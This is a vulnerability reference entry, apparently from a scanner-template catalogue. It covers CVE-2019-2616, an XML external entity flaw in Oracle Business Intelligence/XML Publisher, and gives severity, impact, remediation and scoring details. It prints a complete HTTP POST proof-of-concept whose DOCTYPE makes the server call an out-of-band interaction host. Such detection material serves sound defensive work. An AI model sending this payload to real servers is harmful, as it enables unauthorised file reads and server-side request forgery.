| Title | Oracle Business Intelligence/XML Publisher - XML External Entity Injection |
|---|---|
| Author | pdteam |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks. |
| Remediation | Apply the necessary patches or updates provided by Oracle to fix this vulnerability. |
| CVSS Score | 7.2 |
| EPSS Score | 0.94278 |
| CVE ID | CVE-2019-2616 |
| Tags | cve cve2019 oracle xxe oast kev edb vkev vuln |
Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack.
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 96
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip
<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://d5jpgdhle0o3c5046rgg6e7fm14jrc8hx.oast.site">
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-2616.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-2616.pcap
N/AN/A